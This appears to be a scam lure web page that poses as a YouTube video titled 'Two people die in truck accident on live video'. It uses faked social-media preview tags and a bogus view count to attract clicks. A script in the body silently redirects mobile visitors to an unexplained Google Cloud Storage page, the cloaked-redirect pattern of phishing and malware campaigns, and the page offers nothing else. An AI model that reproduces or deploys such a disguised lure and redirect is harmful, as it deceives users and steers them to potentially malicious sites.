<html>
	<head>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
		<meta name="facebook:card" content="summary_large_image" />
		<meta name="facebook:description" content="Youtube" />
		<meta name="facebook:app:country" content="US" />
		<meta property="og:image" content="./imgur.gif" />
		<meta property="og:title" content="Two people die in truck accident on live video" />
		<meta property="og:description" content="854, 865 views" />
		<meta property="og:site_name" content="YouTube" />
		<meta property="fb:app_id" content="124024574287414" />
	</head>
	<body>
<script type="text/javascript">
     //<![CDATA[
         var isMobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
     
         if (isMobile) {
             window.location.href = "https://storage.googleapis.com/6765drthj/index.html";
         }
     //]]>
     </script>